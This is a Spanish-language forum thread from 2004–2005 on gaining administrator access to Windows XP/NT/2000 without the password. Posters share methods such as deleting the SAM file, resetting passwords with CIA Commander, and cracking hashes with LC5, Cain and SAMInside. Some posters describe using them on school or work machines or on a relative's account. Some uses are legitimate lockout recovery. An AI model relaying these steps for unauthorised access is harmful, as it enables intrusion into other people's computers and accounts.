bueno si somos tan estupidos disculpame pero almenos dame la solucion o di explisitamente donde sale como decodificar una sam de un win2k con fat32 ya q eso es lo q necesitamos y pq mi estupido cerebro no fue capaz de encontrarlo ni he sido capaz de lograrlo solo asi q espero q tu mente de genio superdotado lo logre ya q no soy el unico estupido q ha preguntado eso y eso solo significa q somos muchos estupidos o que tu eres un genio incluso pueden ser ambas
pd:no trates a nadie de estupido mejor preocupate de ayudar a q entiendan los demas.


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: javnca en 8 Octubre 2004, 03:53 am
Sres. he decidido escribir esto porque veo que hay muchos que dicen barbaridades y no ayudan en nada.

Si quieres entrar como administrador a nt/xp/2000 hay varias maneras:

Si la particion es NTFS, puedes usar el Cia Commande V1, lo consigues a traves de Emule o buscando por google.

Puedes poner el disco Duro que quieres saber la clave como esclavo en otro pc y borrar el archivo /system32/config/SAM

Puedes usar software como LC5 de @stake

si la maquina pertenece a un dominio, puedes ingresar a elladesde la red  como administrador del dominio y borrar el archivo SAM

Si la particion es Fat32, con un disco de arranque de win98 entras en modo DOS y entras a /winnt/system32/config/
y barras el archivo SAM y SAM.log si lo hay.

Espero que les sirva



Si la particion es


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: syaksic en 9 Octubre 2004, 02:18 am
creo q cuando lo sacas con disco de inicio no puedes usar el saminside y no se hacen las hashes (creo q es pq tiene otro formato q cuando se saca por ntfs)


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: sroot en 22 Octubre 2004, 03:09 am
Pero nadie me pudo decir como descifrar la contraseña crackeada con archivos .usr, q en el manual dice q tenemos q hacerlo con un tal programa ciacommanderPWD.exe (no es el commander q usamos para el diskette)


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: -manolox- en 23 Octubre 2004, 12:40 pm
jajaja como siempre digo winsucks xD ::)


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: balta_zar en 26 Octubre 2004, 11:53 am
He leido casi todos los manuales de esta pagina relacionados con el tema Entrar a XP/NT/2000 como administrador en 30 segundos y por cierto me ha tomado mas de 30 segundos lograr el pass.Primero utilice el cia comander en windows/sistem32/config/Sam  copie el sam en un disco tal como dice el manual (salio como txt) lo coloco en el lc5 "import from a sam file y me dice algo como impropet format  y despues de todo el esfuerzo plop que hice mal??


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: ANELKAOS en 12 Noviembre 2004, 15:01 pm
Vale pero esto no es nada nuevo aunque el primer post está escrito « en: 17 Septiembre 2003, 10:28 » creo recordar que en las Navidades del 2002 se me olvídó el user&pass que le habia puesto a un Win2k. Cual fue mi sorpresa cuando no habia forma humana de arrancar el pc sin destripar lo q tenia (algo bastante improbable ya q se m acercaban los exámenes de febrero ) Tras buscar y buscar un colega apareció con la url mágica de un sueco q habia hexo un disco d arranke en Basic con el cual conseguia ver los nombres d usuario del ekipo y las contraseñas permitiendome modificarlas. El problema es si eres hábil entre los hábiles y le dices q tu bios q no arranke desde el diskette entonces si que lo habria tenido jodido jajaja


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: garbaio en 17 Noviembre 2004, 09:20 am
Puedo con el CIACommander ?
1º - salvar el pass del administrador en un diskette.
2º - cambiar el pass.
3º - reiniciar y instalar lo que yo quiera.
4º - con el ciacommander restaurar el pass
funcionará todo como antes?
Si es así ,lo cierto es que no necesito saber la clave del administrador ni desencriptarla,ni cosas raras.
Gracias por contestarme.


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: ANELKAOS en 17 Noviembre 2004, 13:30 pm
 ;D 10 fallos mas q reparar con el SP3 para Win XP   ;D

http://www.astalavista.com/?section=news&cmd=details&newsid=965


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: susito21 en 17 Noviembre 2004, 23:45 pm
Puedo con el CIACommander ?
1º - salvar el pass del administrador en un diskette.
2º - cambiar el pass.
3º - reiniciar y instalar lo que yo quiera.
4º - con el ciacommander restaurar el pass
funcionará todo como antes?
Si es así ,lo cierto es que no necesito saber la clave del administrador ni desencriptarla,ni cosas raras.
Gracias por contestarme.

A MI NO ME DEJA CAMBIAR LA CONTRSEÑA Y ME DICE QUE NO TIENE CUANDO SI QUE TIENE, ???

POR QUE ME DICE QUE NO TIENE Y NO ME DEJA CAMBIARLA ¿????? AYUDA....

PORQUE ¿?


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: kaiserSS en 18 Noviembre 2004, 01:01 am
Buenas!
Haber lo que e exo a sido guardar la contraseña en un disquete pero me lo guarda cifrado en un archivo de extension .usr como lo descifro? si alguien me ayuda le agradeceria
Gracias


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: kaiserSS en 18 Noviembre 2004, 01:44 am
Este post lo pongo por si lo anterios no tiene almacenada el pass.
Como hago para coger el pass del administrador del XP en NTFS eske e leido y no me aclaro con lo de SAM...
Gracias! :P


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: garbaio en 18 Noviembre 2004, 06:44 am
En mi post no estoy afirmando, estoy preguntando si alguien a cambiado el pass de administrador y luego lo ha podido restaurar y dejarlo como antes.Si es así yo puedo poner un pass que yo solo conozco y luego usar el pc sin las restricciones que tengo actualmente en el trabajo,despues restaurar el pass desde el diskette que previamente he guardado.
Lo elegante sería conseguir descifrar el pass pero por lo visto en el foro no parece fácil.


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: inquietante en 26 Noviembre 2004, 23:16 pm
Hola garbaio. Si si que es posible y te lo digo porque yo lo he hecho. Los pasos a seguir más o menos son los siguientes:

Una vez has conseguido cambiar el pass del administrador y entrar en tu pc con todos los privilegios tienes que crearte una cuenta propia como administrador. Una vez hecho esto vuelves a restaurar el pss del administrador original. Instalas el programa cain. Para ello tendrás que hacerlo como administrador. El archivo instalador lo ejecutas como.... Con la cuenta de administrador que te has creado. Una vez instalado lo ejecutas como... cuenta con privilegios administrador tuya. Desde el programa vas a la pestaña crrackers y le dices sam local de la maquina.

Aquí es donde depende de la contraseña tardarás más o menos. Para que te hagas una idea a mi una contraseña de 7 digitos con letras minusculas y números me tardó aproximadamente 3 horitas. (Tampoco es tanto).

Si consigues crackear la contraseña original del administrador, entonces te recomiendo que quites la cuenta que habías creado y así todo queda como estaba.

Espero que te haya ayudado. Ponte manos a la obra y si te encuentras con alguna duda concreta en el camino dimelo.


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: kaiserSS en 28 Noviembre 2004, 22:03 pm
como restauro la contraseña porque yo puedo cambiarlo hasta ahi deacuerdo pero si guarda el pass en un fichero .usr como lo veo porque con el note pad no lo e podido! ???


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: LordOfSeven en 6 Diciembre 2004, 02:35 am
Yo tengo otra forma de entrar como administrador en Win XP cuando el administrador esta protegido por contraseña....Tienes que iniciar Win xP en modo seguro y en la pantalla de seleccion de usuario te va a salir para escojer los usuarios y entre ellos va a estar uno llamado ''Administrador'' (difernete al que esta protegido por contraseña) inicias esta sesion de Administrador (no va a tener contrasseña) ya adentro de este usuario te vas a cunetas de usuario y desde ese usuario puede quitar la contraseña sin saberla de cualquier usuario incluynedo el de administrador y activar la cuenta de Invitado


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: -=[ Mr. Knightmare ]=- en 7 Diciembre 2004, 07:36 am
No el CIA Commander en la version 1.0 solamente soporta a win xp, no se si 2k, pero solamente en particiones NTFS, ya en la version 2.0 que creo que es de prueba, tienen soporte para todos los sistemas windows y sistema de archivos fat-32, pero el programa tenes que grabarlo en un cd, y para bajartelo ellos te envian una imagen iso del programa que te nes que pasarlo a cd.

Con el programa lo que podes hacer es lo siguiente:(probado solo la version 1.0)

Podes cambiar la clave de cualquier usuario del sistema, incluso administradores, esta clave la podes guardar en el disquette, para luego poder reestablecerla.

Podes editar el registro del sistema.

Podes ver, borrar, editar, cualquier archivo del sistema.

Nose si me olvido de algo.....



Título: holas!!!1
Publicado por: neoazul en 9 Enero 2005, 07:25 am
hola me llamo hector
estoy realmente impresionado e interesado en aprender los pasos para poder ingresar al win xp/nt/2000
podrias si no es molestia podrias ser mi tutor y enseñarme a hacerlo.
es relamente urgente el motivo de mi necesidad.
muchas gracias
 ;)


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: Randomize en 9 Enero 2005, 07:38 am
http://foro.elhacker.net/index.php/topic,18632.msg104217.html#msg104217

Pedid y se os dará, buscad y hallaréis, leed y ...


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: PaK0 en 14 Enero 2005, 01:59 am
Citar
Yo tengo otra forma de entrar como administrador en Win XP cuando el administrador esta protegido por contraseña....Tienes que iniciar Win xP en modo seguro y en la pantalla de seleccion de usuario te va a salir para escojer los usuarios y entre ellos va a estar uno llamado ''Administrador'' (difernete al que esta protegido por contraseña) inicias esta sesion de Administrador (no va a tener contrasseña) ya adentro de este usuario te vas a cunetas de usuario y desde ese usuario puede quitar la contraseña sin saberla de cualquier usuario incluynedo el de administrador y activar la cuenta de Invitado


... y además te aparece el teléfono de Pamela Anderson y los números de cuenta de Bill Gates
No te jode


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: machokabrio en 14 Enero 2005, 18:13 pm
Si esto de lo que estan hablando es para quitar el pass de la pc que tienen en sus manos fisicamente pues hay otra mas fecil.
y esa esta en los manuales de su sistema operativo solo es cuestion de leer y entran con todo y pass y lo que quieran sin disquet ni naa por el estilo pero esto es en XP no se si funcione con los demas sdios


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: machokabrio en 14 Enero 2005, 19:05 pm
Si esto de lo que estan hablando es para quitar el pass de la pc que tienen en sus manos fisicamente pues hay otra mas fecil.
y esa esta en los manuales de su sistema operativo solo es cuestion de leer y entran con todo y pass y lo que quieran sin disquet ni naa por el estilo pero esto es en XP no se si funcione con los demas sdios

lo que dicen arriba es cierto es lo que te dice el anual de uso de xp solo tienes que encender tu pc y antes de que empiece tu sistema operativo (que el mio es xp no se si funciona con los demas)tecleas F8 para que te de un menu en donde encontraras varias opciones una de ellas es "modo seguro" en la que entraras y te dira en donde entraras le indikas y listo te mostrara las cuentas de usuario existentes en tu pc y otra mas que se llamara "administrador" entras en esa que es la que no esta protegida por password y ya estando adentro puedes hacer lo que se te antoje como administrador que eres puedes cambiar cuentas a tu antojo y ya cuando cambies o quites los pass de la cuenta a la que quieres entrar reinicias la pc pero ahora entraras normalmente dejas que corra tu sistema operativo y bingo estas adentro para poner nueva contraseña de la cuenta de tu hermano o de tu vieja o que se yo.

P.D:si tu hermano,vieja,amigo,o lo que sea no te dejo entrar en esa cuenta y lo tiene con pass para que tu no lo sepas es por algo buskale y encontraras,cambia el pass y desquita el mal p2, ::)

P.D:si te da el telefono de Pamela y los numeros de cuenta de Bill.............
 pero pa que le deposites mas lana  ::)


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: bukas en 18 Enero 2005, 07:58 am
mirar mi problema eske no tengo ni idea de k acer con el archivo .usr k e obtenido del cia commander.bueno pos eso k aber si me lo explicais detalladamente ya k yo de esto no tengo muxa idea. GRACIAS


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: tirael en 1 Febrero 2005, 03:20 am
¿alguien puede decirme de donde puedo obtener el DATAPOL CIA COMMANDER?, que no sea del emule, ya q no puedo utilizarlo o algun alma caritativa q pueda pasarmelo.Gracias
SALU2.


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: koreano en 1 Febrero 2005, 08:54 am
Citar
Entrar a XP/NT/2000 como administrador en 30 segundos

Salu2:

Sólo añadir que funciona perfectamente la primera versión en NTFS, hasta tal punto que en mi instituto le tuvieron que colocar pass a todas las bios, (hasta tal punto que destornillador en mano se le quitaron las pilas de las bios y se volvió a ser admin). Muy buen programa que crackea la sam, rápido fácil y cómodo.


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: carfor en 1 Febrero 2005, 22:56 pm
 :-* Hola a todos, tan solo dar las gracias a todos los que se toman la molestia de dar respuesta a lo que planteamos los que sabemos poco. Me ha sido de mucha utilidad este foro, por fin puede actuar como administrador del trasto que tengo en el curro.     salu2


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: g0ch0x en 2 Febrero 2005, 01:53 am
 :( Osea...  cuando esojo modo seguro, no me da la opcion de escojer la cuenta con la que deseo ingresar...  cae en modo a prueba de fallos, pero igual me pide un usuario y una contraseña, la cuestion es que ahi no deja ni entran mi usuario...!  :o  ???


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: Elcarenalga en 5 Febrero 2005, 08:40 am
Hijos, y por que mas facil no suben el cia a una web? asi es mas facil bajarlo, o por que no lo rotan por messenger??.. pasenlo en ves de buscar eso que no se encuentra


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: 1nc1d3nt en 9 Febrero 2005, 21:59 pm
Hola. Este programa es genial, no tuve ningun tipo de problema para cambiar pass etc; pero ¿cómo puedo descifrar el fichero .usr donde guarda las pass?
Gracias!


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: Peruano en 26 Febrero 2005, 12:45 pm
Hola. Este programa es genial, no tuve ningun tipo de problema para cambiar pass etc; pero ¿cómo puedo descifrar el fichero .usr donde guarda las pass?
Gracias!

muxa gente esta asiendo esta misma pregunta. io tengo la misma
seria alguien amable de responderla kien la supiera?  ???


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: CHI<`;´>NO© en 7 Marzo 2005, 15:29 pm
Busca y Descarga por: "Passware " en tu programa 2p2 yo ya lo tengo y es un Pack que descifra contraseñas de los programas mas avanzados. Windows NT, zip, rar, Word, Excel, etc etc.  El de Windows te crea en un diskette tu id y contraseña para que entres a Windows com administrador.

Yo ya lo tengo. se los envío a sus correos. (Es cierto el crack de Windows NT cabe en un diskette)



Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: saito89 en 11 Marzo 2005, 04:23 am
alguien sabe como entrar a windows xp, con un usuario q tenga atributos de administrador. Ademas en la compu en la q estoy tengo una contraseña super limitada, y la de administrador en modo a prueba de fallos tiene contraseña, y no la se.


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: denontzat en 15 Marzo 2005, 23:22 pm
veamos;

Estoy en un ordenador que tiene en la pantalla principal:
4 cuentas y una de ellas renombrada con los supuestos privilegios de usuario.

Entrando en modo seguro (F8) efectivamente aparece dicha cuenta con los privilegios de usuario y la propia cuenta ADMINISTRADOR ambas con Codigo !!

Entrando con el CIA, y a pesar de que me dice que cambia bien los passwords, luego a la hora de la verdad no es así, los cambios no son efectivos. Por lo tanto, que puedo hacer?

Si alguien lo sabe que por favor me lo diga asi mismo los programas que necesito. grache.


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: charlieK en 16 Marzo 2005, 17:50 pm
Hola gente, usé el Cia Commander y cuando seleccioné el user "Administrador", me dijo que este usuario no tenia contraseña y que no podia cambiársela.

Luego intenté entrar como "Administrador", pero no me aparece este usuario en la lista inicial de usuarios. Agradeceré me indiquen cómo hago para entrar como "Administrador".

Gracias.


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: Peruano en 23 Marzo 2005, 12:48 pm
tienes que entrar en modo a prueba de fallos.

presiona f8 antes de que corra windows


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: LordSith en 24 Marzo 2005, 06:42 am
Hijos, y por que mas facil no suben el cia a una web? asi es mas facil bajarlo, o por que no lo rotan por messenger??.. pasenlo en ves de buscar eso que no se encuentra

Aqui

Amigos

De hecho que sirve, conpruebenlo ustedes mismos.

Aqui esta un link gratis al programa

http://www.emulesoft.com/descargas_directas-file-761.html

 :o


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: Eldest en 28 Marzo 2005, 04:17 am
Hola a tod@s  ;D!! Es mi primer post y quería comentar un problemilla...me bjaé el CIA commander de http://www.matcode.com/ciainst.exe y creé el disco de arranque. Arranqué el pc con el disco dentro y funcionaba bien hasta que cuando quise cambiar la contraseña del administrador me salía ERROR que ese CIA solo servía para leer. Que CIA me tengo q bajar para que me deje cambiar la contraseña??? ???

Editado: Ya me he bajado otra versión y funciona perfectamente :D


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: wayto en 30 Marzo 2005, 02:03 am
Es que para esto no hay mucho misterio, el cd knoppix tambien lo hace y si tienes un disco duro con xp o 2000 distinto al que queremos mirar, nos ponemos como administrador y entramos al disco 2 como queramos :D

Saludos


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: the_terrible en 5 Abril 2005, 05:20 am
Bueno creo que ya son mil y un veces que toda la gente de este tema dice no funciona , no cambia... si cambia no entro... la verdad es que si lo hace ......... lo unico que hay que hacer es tener la version full.
Espero a uan alma caritativa que pueda posteralo o en la web creo que ya es hora de tenerlo en la sección downloads
 ;D ;D


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: Hacks78 en 4 Abril 2005, 23:35 pm
Pues simplemente hay leerse todo el tema desde el primer post, ya que acabo de bajar el programa con la liga edonkey que esta en la  primer página y además el crack que támbien indican enlace en la segunda página y funciona bien solo que al ver cual es mi contraseña (para ver si funciona esta cosa) me decia que no tenia, lo cual no es cierto, debio a que?, quien sabe?  ??? no se si sera por que tengo XP pro SP2, espero alguien pueda contestar esto por si alguien a quien le interese lo pueda resolver. Saludos....


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: v3rtik4l en 5 Abril 2005, 19:58 pm
Muy buen manual azazel, ya utilizaré el programa en los pc de mi instituto..  :P y .. estoy deacuerdo cnotigo tanto, trucoswindows como este foro son de los mejores que hay, yo también estoy en el otro.. jeje bueno, 1 cordial saludo v3rtik4l


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: ricardo II en 6 Abril 2005, 18:42 pm
yo lo he encontrado pero no me deja instalarlo, porque viene en otro idioma, quien me dice donde puedo encontrar el cia commander, en ingles o español :)


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: Hacks78 en 6 Abril 2005, 18:50 pm
En el link que da AZAZEL del Emule ahi lo descargas en Ingles


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: mjnemesis en 16 Abril 2005, 06:54 am
hola a todo mundo que tal bueno lei todos los mensajes que escribieron porque me interesa conocer la contraseña del XP

El problema es que se crea mucha Confusión y me gustaria que algunas dudas generales se aclararan

1.- Si  windows XP tiene una cuenta de administrador  con password y no se sabe cual es pero solo se quiere conocer cual es (No cambiarla solo conocer cual es) segun el manual de DataPol Cia Commander en la parte de User manager menciona que salen los datos del usuario y ahi nos muestra informacion del usuario entre esta informacion, nos muestra el pass si esto es correcto entonces solo es cosa de anotarla en un papelito, iniciar el S.O. y anotar la contraseña que anotamos ¿o no es asi? ¿si no es asi entonces que es?

2.- Tambien menciona que podemos editar datos que se muestran tanto alfanumericamente como en forma hexadecimal, si esto es cierto pues solo cambiamos la clave a una que queramos y entramos con nuestra contraseña y yaaa ¿o no?

3.- En el foro se menciona tambien que accedas desde MS-DOS y borres el SAM pero esto que implica, supongo que como este archivo contiene el pass pues al borrarlo, Windows al iniciar ya no pediria la contraseña "SUPONGO" porque no se menciono que sucede al borarlo pero si alguien sabe.... porfa  ;)  digan que onda


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: chibihacker en 21 Abril 2005, 01:42 am
Bueno, yo hasta ahora intente detectar la pass por medio de los sams y el sam inside pero no funciono (y eso que use el sam y el system) voy a intentar con este, el cya comander (es raro porque me hace recordar de otro programa viejo ahi...).  con saminside Anteriormente habia captado todos los nombres de usuario, saben si con el CIA Co puedo cambiar la password o por lo menos, ver la password sin necesidad de cambiarla por medio del registro?, y pues, creen que borrando la sam se solucionaria el problema? pues yo tengo el archivo sam y system del ordenador al que quiero acceder.
Can anybody help me?  :D


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: chibihacker en 22 Abril 2005, 23:57 pm
Bueno he usado el Comander y pues..no ha funcionado. he visto la cantidad de usuarios pero cuando le pido cambiar la password me dice que no tiene una password :S y pues no se que hacer en esta parte, deberia haberla cambiado? tengo que entrar al registro? o.o ....help.


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: ROBOTITO en 28 Mayo 2005, 18:56 pm
Ok...   he leido todos los mensajes de este tema varias veces;
y tambien he usado el cia comander en varias maquinas, pero algo q he notado es que con las maquinas que tienen motherboard Biostar, a veces esto no funciona. manda el mensaje de que ha cambiado el password pero luego cuando uno quiere ingresar no es posible. 

   si alguien puede confirmar esto seria bueno, y si tambien pueden solucionarlo seria mucho mejor

  solo  yy   mis respestos para el foro  esta excelente  hay mucho q aprender


Título: NO PUEDO
Publicado por: liusssss en 1 Junio 2005, 19:47 pm
Que onda, tengo tiempo leyendolos, pero apenas hoy me anime a registrarme.,

He aqui mi problema.,

Al momento de entrar a User Managar ., me sale un mensaje que dice "el usuario ADMINISTRADOR esta bloqueado, desea desbloquearlo?" .. le pongo que SI...

Despues, cambio la contraseña con F3 y me sale un mensaje que dice que se ha cambiado la contraseña con exito...

Ok, todo bien..

Pero al momento de entrar a windows, me pide la contraseña de administrador, pongo la que "supuestamente cambie" .. y me sale contraseña incorrecta... al parecer el CIA COMMANDER no la cambió...

Cuando entro en modo seguro, me sigue pidiendo la contraseña del administrador... la cual, aun no puedo saber, ni cambiar¡

Que hago? Ni si quiera puedo entrar como invitado porque esta desactivada la contraseña...

Me meto a File Manager y borro el directorio "SAM" ?????

Ayudenme porfa, tengo como 2 semanas sin poder usar mi compu...

Gracias


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: Javiercito en 2 Junio 2005, 06:14 am
pues efectivamente este pequeño y poderoso programita llamdo Cia Commander hace que seas un administrador del guindos exis pe hacer y deshacer ya lo eh comprobado en mi escuela y fue tan facil como si yo me supiera los pass de las pe c´s y pues ahora la escuela tuvo que formatiar las pe c´s porque los pass fueron cambiados por un oscioso que mala onda  ;D bueno me despido y saludos a todos y arriva el norte :D


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: *PIPO* en 6 Junio 2005, 18:20 pm
y digo io no hay una manera mas sencilla de pillar la pass d un admin?????


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: lanenita666 en 21 Junio 2005, 05:12 am
porfavor... si.. necesito saber eso.. por que tengo un documento totalmente importante en mi compu y el condenado mugro Cia Commander no me ah cambiado la contraseña... porfavor.. ayudaaaaaaaaaaaaaaa


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: win32 en 26 Agosto 2005, 08:10 am
Buenas gente, llevo tiempo leyendo y sacando buena info de este foro, la verdad que esta barbaro, y de hecho han sido pocas las veces que he tenido que hacer alguna pregunta, porque el buscador me ha salvado las papas. Pero ésta no la encontre.

Tengo xp, solo la uso yo, y a mi cuenta de usuario le di mi nombre, porque no me gustaba el de administrador.

El tema es este: Hace un par de meses, la verdad nose que habre echo y me aparecio una nueva cuenta, la de ADMINISTRADOR, la cual opte por desactivarla porque siempre arrancaba antes que la mia, la verdad no le di mucha porque la maquina la reseteo muy pocas veces (esta siempre encendida) y bueno, por esas cosas de toqueton, me puse a joder con las cuentas de usuarios, para ver si podia eliminar esa molesta cta. de ADMINISRADOR, pero que paso!
De tanto tocar, termine por eliminar mis atributos de Administrador, si, re-idiota.
Asi que ese es el motivo por el cual recurro a este medio, esperando una respuesta coherente, porque como ya dije, no la encontre en el buscador.

Lei sobre el Cia Commander, pero no quiero recuperar una contraseña porque nunca la tuve, solo quiero volver a tener mis atributos de Administrador.

Espero que me ayuden y no me respondan "Utiliza el buscador" o cosas asi.
Bueno espero haber sido claro, y estare atento, desde ya gracias.


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: Sagman en 26 Agosto 2005, 08:56 am
Seguramente has puesto tu cuenta en modo limitada

Para solucionarlo puedes ir a las cuentas de usuario (como Administrador), y cambiar tus atributos allí


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: -EvilBuffer- en 26 Agosto 2005, 09:05 am
Hay una imagen de floppy que encontre la otra vez por la red es un mandrake 1.x o 2.x no recuerdo, en fin la cuestion es que este mini floppy tiene utilidades para tumbar sam, el archivo de las contraseñas del WinXP solo es cuestion de seguir los pasos que vienen con un script

no recuerdo donde lo baje pero lo tengo en mi compu si les interesa luego publico el enlaze

pasos:

- reseteas la maquina (la cual no tienes acceso a admin)
- booteas con el floppy
- tumbas el password
- reinicias la pc
- entras como admin

Saludos  ;D


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: win32 en 26 Agosto 2005, 17:49 pm
Buenas otra vez.
Si estas dos respuestas han sido para mi, entonces no me entendieron.

Voy a tratar de explicarlo mejor:
Cuando instale xp, genere una unica cuenta con mi nombre.
En algun momento, nose cuando, se creo la cuenta por defecto de Administrador.
La cuentta de Administrador la DESACTVE, porque iniciaba antes que la mia, y tenia que cerrar cesion e iniciar la cuenta con mi nombre.

Tratando de eliminar la cuenta de Administrador, termine por Eliminar mis atributos de Administrador.

Lo que quiero es Recuperar Mis Atributos De Administrador.

No me sirve de nada tratar de recuperar una contraseña: Primero, porque nunca tuve contraseña, ni en mi cuenta, ni en la de Administrador.
Segundo: La cuenta Administrador recuerden que la he desactivado.
Asi que en teoria en la maquina no existe ninguna cuenta con Atributos De Adimnistrador.

Bueno, espero haber sido claro.
No quiero formatear porque seria el camino mas facil.

Tomenlo como un Examen, haber que tanto saben :)
Pero enserio, lo necesito, otra vez gracias.

Ah! y cuando respondan, si no es mucha molestia, incluyan el nombre a quien estan respondiendo, asi de esta manera podre agradecer o criticar :) mas personalmente.


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: Sagman en 26 Agosto 2005, 18:08 pm
Segundo: La cuenta Administrador recuerden que la he desactivado.
Asi que en teoria en la maquina no existe ninguna cuenta con Atributos De Adimnistrador.
Seguramente has puesto tu cuenta en modo limitada

Para solucionarlo puedes ir a las cuentas de usuario (como Administrador), y cambiar tus atributos allí
Yo he dado la solución a tu problema :D


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: win32 en 27 Agosto 2005, 07:37 am
agradezco mucho tu ayuda |$@gm@n™|  pero veo que no me has entendido.

La cuenta Administrador la desactive, Asi que cuando intento entrar como administrador me pone el mensaje obvio "La cuenta Administrador ha sido desactivada"

Cuando ingreso a cuentas de usuario para activarla, me da "Acceso Denegado"

Espero que tengas algo mas debajo de la manga para poder ayudarme... un abrazo.


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: win32 en 27 Agosto 2005, 08:59 am
Buenas noticias gente!!!
 Ya  pude recuperar mis atributos de Administrador, Asi que ahora se los dejo como una manera mas de poder ingresar como administrador en un sistema en el cual no tienen permisos.

Cuando inicia XP (cuando esta haciendo el post) presionar F8 e ingresar como "Modo Seguro", de esta forma tendran todos los privilegios de Administrador.

Espero sea de utilidad, por lo menos a mi me solucionó el problema.

Saludos...


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: Makabron en 9 Septiembre 2005, 22:58 pm
  Y si no tengo floppy?  :-\


Título: Re:Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: zuse295 en 23 Septiembre 2005, 07:55 am
:P

si alguien no a encontrado la version completa del cia commander yo tengo un pequeño crack por asi decirlo que copia un archivo a tu disco de inicio del cia commander haciendo que tengas todos los privilegios de cambiar passwords, etc si quieren agregarme a su msn y se los paso con mucho  : :Doye pasame tu correo para que me pueda conectar con tigo


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: srk en 6 Octubre 2005, 21:34 pm
primeramente hola a todos...

bueno la razon por la que escribo este post es que estoy un poco desesperado, ya que no e podido entar a la cuenta del administrador, no se, si sera, el cia commander o la configuracion del la computadora,  el problema es el siguiente.

e seguido al pie de la letra el tutorial del cia que se publico en este foro, (me permite ver las carpetas del administrador y de todos los usuarios), pero al llegar a la paso donde se indica que;

Tendremos entonces que indicarle al programa cual es el directorio del sistema operativo.
Será normalmente c:Windows o es c:Winnt
Seleccionamos el directorio correcto y pisamos la barra espaciadora.

me aparece /( root ) y no puedo escribir c:Windows o c:Winnt, le presiono la barra espaciadora y me aparece, erro en el directorio. 

mi pregunta o mis preguntas son:

¿ Es el problema tienen que ver con cia commander o como esta el sistema configurado ya que por donde quiera tiene contraseña?

¿que es lo que puedo hacer?

¿ Hay otra forma de entrar como administrador con otro programa similar ?
¿ como con el NTFSPRO v5 que menciona AlNitak? si es asi ¿donde puedo encontrarlo ?

agradeceria mucho si me contestaran estas preguntas 

Gracias 

psycho_die1@hotmail.com


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: javc en 21 Octubre 2005, 04:20 am
jajaj la verdad que tenes razon el cia comander anda muy bien y soy tecnico y lo suelo usar para cambiar los pass de personas que se olvidan!!!:...  ::)


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: javc en 21 Octubre 2005, 04:30 am
esta muy bueno el cia!!!!! muy locooOoo


Título: Re: Entrar a XP/NT/2000 como administrador en 30 segundos
Publicado por: Tony_Z en 21 Octubre 2005, 08:22 am
